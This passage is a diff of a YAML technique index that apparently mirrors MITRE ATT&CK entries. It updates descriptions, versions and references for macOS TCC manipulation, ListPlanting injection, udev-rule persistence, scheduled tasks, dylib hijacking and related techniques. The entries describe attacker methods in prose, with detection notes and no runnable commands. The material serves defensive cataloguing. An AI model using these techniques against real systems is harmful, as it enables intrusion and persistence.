-      modified: '2024-04-17T00:02:12.021Z'
+      modified: '2024-10-16T16:54:56.714Z'
       name: TCC Manipulation
-      description: "Adversaries can manipulate or abuse the Transparency, Consent,
-        & Control (TCC) service or database to execute malicious applications with
-        elevated permissions. TCC is a Privacy & Security macOS control mechanism
-        used to determine if the running process has permission to access the data
-        or services protected by TCC, such as screen sharing, camera, microphone,
-        or Full Disk Access (FDA).\n\nWhen an application requests to access data
-        or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
-        located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
-        for existing permissions. If permissions do not exist, then the user is prompted
-        to grant permission. Once permissions are granted, the database stores the
-        application's permissions and will not prompt the user again unless reset.
-        For example, when a web browser requests permissions to the user's webcam,
-        once granted the web browser may not explicitly prompt the user again.(Citation:
-        welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
-        abuse the TCC service to execute malicious content. This can be done in various
-        ways, including using privileged system applications to execute malicious
-        payloads or manipulating the database to grant their application TCC permissions.
-        \n\nFor example, adversaries can use Finder, which has FDA permissions by
-        default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
-        while preventing a user prompt. For a system without System Integrity Protection
-        (SIP) enabled, adversaries have also manipulated the operating system to load
-        an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
-        TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
-        inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
-        into targeted applications with the desired TCC permissions.\n"
+      description: |+
+        Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+        When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+        Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -23239,6 +23501,8 @@ privilege-escalation:
         phase_name: privilege-escalation
       x_mitre_contributors:
       - Marina Liang
+      - Wojciech Reguła @_r3ggi
+      - Csaba Fitzl @theevilbit of Kandji
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -23246,7 +23510,7 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - macOS
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Modification'
@@ -23276,7 +23540,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.008:
     technique:
@@ -23322,7 +23585,7 @@ privilege-escalation:
         description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
           Retrieved December 20, 2017.
         source_name: Chokepoint preload rootkits
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:26:31.766Z'
       name: Ptrace System Calls
       description: "Adversaries may inject malicious code into processes via ptrace
         (process trace) system calls in order to evade process-based defenses as well
@@ -23367,8 +23630,6 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1037.001:
     technique:
@@ -23394,7 +23655,7 @@ privilege-escalation:
         url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
         description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
           18. Retrieved November 15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:03.153Z'
       name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
       description: "Adversaries may use Windows logon scripts automatically executed
         at logon initialization to establish persistence. Windows allows logon scripts
@@ -23420,59 +23681,28 @@ privilege-escalation:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1037.001
     atomic_tests: []
   T1055.015:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - ESET
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
-      type: attack-pattern
-      created: '2021-11-22T15:02:15.190Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1055.015
-        url: https://attack.mitre.org/techniques/T1055/015
-      - source_name: Microsoft List View Controls
-        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
-        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
-          January 4, 2022.
-      - source_name: Modexp Windows Process Injection
-        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
-        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
-          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
-          Retrieved November 15, 2021.'
-      - source_name: ESET InvisiMole June 2020
-        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
-        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
-          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-14T17:34:33.948Z'
       name: 'Process Injection: ListPlanting'
       description: "Adversaries may abuse list-view controls to inject malicious code
         into hijacked processes in order to evade process-based defenses as well as
         possibly elevate privileges. ListPlanting is a method of executing arbitrary
-        code in the address space of a separate live process. Code executed via ListPlanting
-        may also evade detection from security products since the execution is masked
-        under a legitimate process.\n\nList-view controls are user interface windows
-        used to display collections of items.(Citation: Microsoft List View Controls)
-        Information about an application's list-view settings are stored within the
-        process' memory in a <code>SysListView32</code> control.\n\nListPlanting (a
-        form of message-passing \"shatter attack\") may be performed by copying code
-        into the virtual address space of a process that uses a list-view control
-        then using that code as a custom callback for sorting the listed items.(Citation:
-        Modexp Windows Process Injection) Adversaries must first copy code into the
-        target process’ memory space, which can be performed various ways including
-        by directly obtaining a handle to the <code>SysListView32</code> child of
-        the victim process window (via Windows API calls such as <code>FindWindow</code>
+        code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+        Code executed via ListPlanting may also evade detection from security products
+        since the execution is masked under a legitimate process.\n\nList-view controls
+        are user interface windows used to display collections of items.(Citation:
+        Microsoft List View Controls) Information about an application's list-view
+        settings are stored within the process' memory in a <code>SysListView32</code>
+        control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+        be performed by copying code into the virtual address space of a process that
+        uses a list-view control then using that code as a custom callback for sorting
+        the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+        must first copy code into the target process’ memory space, which can be performed
+        various ways including by directly obtaining a handle to the <code>SysListView32</code>
+        child of the victim process window (via Windows API calls such as <code>FindWindow</code>
         and/or <code>EnumWindows</code>) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
         methods.\n\nSome variations of ListPlanting may allocate memory in the target
         process but then use window messages to copy the payload, to avoid the use
@@ -23489,6 +23719,9 @@ privilege-escalation:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - ESET
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitoring Windows API calls indicative of the various types
         of code injection may generate a significant amount of data and may not be
         directly useful for defense unless collected under specific circumstances
@@ -23503,21 +23736,52 @@ privilege-escalation:
         arguments.\n\nAnalyze process behavior to determine if a process is performing
         unusual actions, such as opening network connections, reading files, or other
         suspicious actions that could relate to post-compromise behavior. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: Process Modification'
       - 'Process: OS API Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+      created: '2021-11-22T15:02:15.190Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1055/015
+        external_id: T1055.015
+      - source_name: Hexacorn Listplanting
+        description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+          trick. Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+      - source_name: ESET InvisiMole June 2020
+        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+      - source_name: Microsoft List View Controls
+        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+          January 4, 2022.
+        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+      - source_name: Modexp Windows Process Injection
+        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+          Retrieved November 15, 2021.'
+        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1055.015
     atomic_tests: []
   T1484:
     technique:
-      modified: '2024-04-19T04:27:31.884Z'
+      modified: '2024-10-15T15:55:32.946Z'
       name: Domain or Tenant Policy Modification
       description: "Adversaries may modify the configuration settings of a domain
         or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -23562,9 +23826,8 @@ privilege-escalation:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '3.0'
+      - Identity Provider
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Deletion'
       - 'Active Directory: Active Directory Object Creation'
@@ -23621,8 +23884,8 @@ privilege-escalation:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Sygnia Golden SAML
         description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
           Attack. Retrieved January 6, 2021.
@@ -23631,7 +23894,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.008:
     technique:
@@ -23673,7 +23935,7 @@ privilege-escalation:
         Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
 
         Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:34:43.405Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: LSASS Driver'
       x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -23698,12 +23960,11 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.008
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -23743,8 +24004,10 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -23752,13 +24015,13 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -23789,9 +24052,6 @@ privilege-escalation:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests:
     - name: Creating GCP Service Account and Service Account Key
@@ -23913,10 +24173,10 @@ privilege-escalation:
           '
   T1053.002:
     technique:
-      modified: '2023-11-15T14:38:10.876Z'
+      modified: '2024-10-12T15:53:12.333Z'
       name: 'Scheduled Task/Job: At'
       description: |-
-        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
 
         On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the <code>at.allow</code> file. If the <code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. Every username not listed in <code>at.deny</code> is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the <code>at.deny</code> exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
 
@@ -23979,7 +24239,7 @@ privilege-escalation:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Scheduled Job: Scheduled Job Creation'
@@ -24013,8 +24273,8 @@ privilege-escalation:
         url: https://man7.org/linux/man-pages/man1/at.1p.html
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Microsoft Scheduled Task Events Win10
         description: Microsoft. (2017, May 28). Audit Other Object Access Events.
           Retrieved June 27, 2019.
@@ -24023,6 +24283,10 @@ privilege-escalation:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Malicious Life by Cybereason
+        description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+          the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+        url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -24035,7 +24299,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.002
     atomic_tests: []
   T1055.001:
@@ -24138,9 +24401,67 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.001
     atomic_tests: []
+  T1546.017:
+    technique:
+      modified: '2024-11-11T19:05:38.708Z'
+      name: Udev Rules
+      description: |-
+        Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+        Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Eduardo González Hernández (@codexlynx)
+      - Eder Pérez Ignacio, @ch4ik0
+      - Wirapong Petshagun
+      - "@grahamhelton3"
+      - Ruben Groenewoud, Elastic
+      x_mitre_deprecated: false
+      x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+        in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+        specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+        2024) '
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'File: File Modification'
+      type: attack-pattern
+      id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+      created: '2024-09-26T17:02:09.888Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/017
+        external_id: T1546.017
+      - source_name: Ignacio Udev research 2024
+        description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+          persistence. Retrieved September 26, 2024.
+        url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+      - source_name: Elastic Linux Persistence 2024
+        description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+          -  A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+        url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+      - source_name: Reichert aon sedexp 2024
+        description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+          Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+        url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1546.007:
     technique:
       x_mitre_platforms:
@@ -24176,7 +24497,7 @@ privilege-escalation:
         Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at <code>HKLM\SOFTWARE\Microsoft\Netsh</code>.
 
         Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:09:17.363Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Netsh Helper DLL'
       x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
@@ -24200,12 +24521,11 @@ privilege-escalation:
       - SYSTEM
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.007
     atomic_tests: []
   T1574.004:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:39.601Z'
       name: Dylib Hijacking
       description: |-
         Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -24289,11 +24609,10 @@ privilege-escalation:
         url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -24345,9 +24664,8 @@ privilege-escalation:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests: []
   T1574.012:
@@ -24396,7 +24714,7 @@ privilege-escalation:
         url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
         description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
           Profilers. Retrieved June 24, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T21:35:12.049Z'
       name: 'Hijack Execution Flow: COR_PROFILER'
       description: |-
         Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -24434,30 +24752,29 @@ privilege-escalation:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1574.012
     atomic_tests: []
 execution:
   T1053.005:
     technique:
-      modified: '2023-11-15T14:33:53.354Z'
+      modified: '2024-10-13T16:13:47.770Z'
       name: 'Scheduled Task/Job: Scheduled Task'
       description: "Adversaries may abuse the Windows Task Scheduler to perform task
         scheduling for initial or recurring execution of malicious code. There are
         multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
         utility can be run directly on the command line, or the Task Scheduler can
         be opened through the GUI within the Administrator Tools section of the Control
-        Panel. In some cases, adversaries have used a .NET wrapper for the Windows
-        Task Scheduler, and alternatively, adversaries have used the Windows netapi32
-        library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
-        utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
-        though <code>at.exe</code> can not access tasks created with <code>schtasks</code>
-        or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
-        programs at system startup or on a scheduled basis for persistence. The Windows
-        Task Scheduler can also be abused to conduct remote Execution as part of Lateral
-        Movement and/or to run a process under the context of a specified account
-        (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+        Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+        wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+        used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+        (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+        Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+        create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+        Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+        system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+        can also be abused to conduct remote Execution as part of Lateral Movement
+        and/or to run a process under the context of a specified account (such as
+        SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
         adversaries have also abused the Windows Task Scheduler to potentially mask
         one-time execution under signed/trusted system processes.(Citation: ProofPoint
         Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
@@ -24504,7 +24821,7 @@ execution:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
@@ -24536,8 +24853,8 @@ execution:
         url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Tarrask scheduled task
